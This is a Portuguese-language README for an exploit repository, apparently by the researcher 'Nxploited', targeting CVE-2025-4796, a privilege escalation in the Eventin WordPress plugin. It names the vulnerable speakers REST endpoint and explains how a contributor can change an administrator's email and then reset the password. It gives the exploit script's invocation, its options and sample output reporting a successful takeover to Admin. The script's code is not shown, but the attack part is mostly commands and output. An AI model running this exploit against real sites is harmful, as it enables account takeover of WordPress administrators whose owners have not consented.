
Eventin <= 4.0.34 - Autenticado (Colaborador+) Escalação de Privilégios via Alteração de E-mail do Usuário/Assunção de Conta
Eventin <= 4.0.34 - Escalação de Privilégios Autenticada (Contribuidor+) via Alteração de E-mail do Usuário/Assunção de Conta
Este repositório documenta uma vulnerabilidade de escalação de privilégios no plugin Eventin do WordPress (<= 4.0.34) que permite a um usuário autenticado com capacidades de Contribuidor+ alterar os endereços de e-mail de usuários arbitrários por meio da API de atualização de palestrantes do plugin. Ao alterar o e-mail de um administrador, um atacante pode acionar uma redefinição de senha e obter a assunção da conta.
Componente vulnerável: plugin Eventin do WordPress (Eventin\Speaker\Api\SpeakerController::update_item)
Versões afetadas: <= 4.0.34
CVE: CVE-2025-4796
CVSS: 8.8 (Alta)
Instalações ativas: 10,000+
O Eventin não valida corretamente a identidade ou as capacidades do chamador antes de atualizar os detalhes do palestrante/usuário (especificamente o e-mail). Um atacante autenticado como contribuidor (ou superior) pode alterar o endereço de e-mail de outros usuários — incluindo administradores — usando o endpoint REST do plugin:
Depois que o e-mail é alterado para um endereço controlado pelo atacante, o fluxo padrão de redefinição de senha do WordPress pode ser usado para assumir a conta.
Arquivo: CVE-2025-4796.py
Este script automatiza as etapas:
/wp-json/eventin/v2/speakers/<speaker_id> para atualizar o e-mail do palestrante.Requisitos:
Instalação:
pip install requests
Execute o script pela linha de comando:
python CVE-2025-4796.py -u https://target.site -id 9 -email [email protected] -user contributor_user -pass contributor_password
Exibir ajuda do script:
python CVE-2025-4796.py -h
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD
Exploit For: CVE-2025-4796 By: Nxploited
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-id, --speaker_id SPEAKER_ID
Enter the speaker ID for the user
-email, --email EMAIL
Enter a new email address
-user, --username USERNAME
Enter the username for the account to upgrade
-pass, --password PASSWORD
Enter the password for the account to upgrade
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...
[+] Exploitation in progress, please wait ...
[+] Exploitation successful.
[+] The account has been updated to Admin.
Speaker ID : 9
Email : [email protected]
[!] Please reset your password using the email: [email protected]
Por: Khaled Alenaz (Nxploited)
GitHub: https://github.com/Nxploited/